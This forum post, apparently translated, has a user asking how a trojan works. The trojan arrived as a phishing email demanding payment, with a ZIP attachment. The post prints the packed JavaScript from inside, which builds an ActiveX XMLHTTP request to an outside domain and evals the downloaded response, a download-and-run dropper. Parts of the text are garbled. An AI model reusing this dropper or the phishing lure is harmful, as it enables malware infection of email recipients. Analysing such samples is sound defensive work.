Malware

What vulnerability does this trojan exploit?

Good day! Another Trojan came to corporate mail with the following content of the letter:

Good afternoon. We inform you that you have not paid the full amount for the services rendered (see the reports in the attachment). Please complete the settlement by Friday, otherwise penalties will automatically begin to accrue. If you have any questions about the attached documents, we are waiting for feedback.

Inside -- a file named "Requisites_for_calculation (services) pdf.zip"
If you open the file in a text editor, you can see the PK header signature, then some JS code follows:
/// 44bd2d8b8809da6d917416e1ff6cd9ab
/// 4754ac4cfd566dd8a504bbe8a0cded41
eval(function(c,e) ,a,b,d,f){d=function(a){return a.toString(36)};if(!"".replace(/^/,String)){for(;a--;) f[a.toString(e)]=b[a]||a.toString(e);b=[function(a){return f[a]}];d=function(){return"\\w+ "};a=1}for(;a--;)b[a]&&(c=c.replace(new RegExp("\\b"+d(a)+"\\b","g" ),b[a]));return c}('d 5=["ef","c","b://7.9","8","g"],a=ih(5[0 ]);a[5[3]](5[1],5[2],0);a[5[4]]();a[5[3]](5[1],a.6 ,0);a[5[4]]();j(a.6);',20,20,"_0xc332 ResponseText flexured open com http GET var MSXML2 XMLHTTP send ActiveXObject new eval".split(" "),
A34b1357c2cf94df8166efc8393669d3
/// /// 937512e44a4023a51be3472c93e14b06
/// a562cf96b2a9fdc3ae1ab0f5abd09baf
/// 70528b780de8760978cfb3cb56025709
/// 48767e01b9f7766c7536f4261d5effad
/// 7cfe91ef2168145f28bbbfe5df31110d
0, {}));
Link to virustotal: https :
//www.virustotal.com/en/file/7b66c3ad45b5394... ?????? - ?????? - ?? ?? 27-?? ???? 2016?. ??? ?? ? ????? ??????? ?? ???? ? ???????.??? ?? ? ???? ????.bb6ebce_txt_.js The trojan sent it to the Kaspersky database. The question is, how does it actually work? How does a JS script run? I opened the file in the virtual machine with the built-in screw archiver - the system showed that the file was damaged.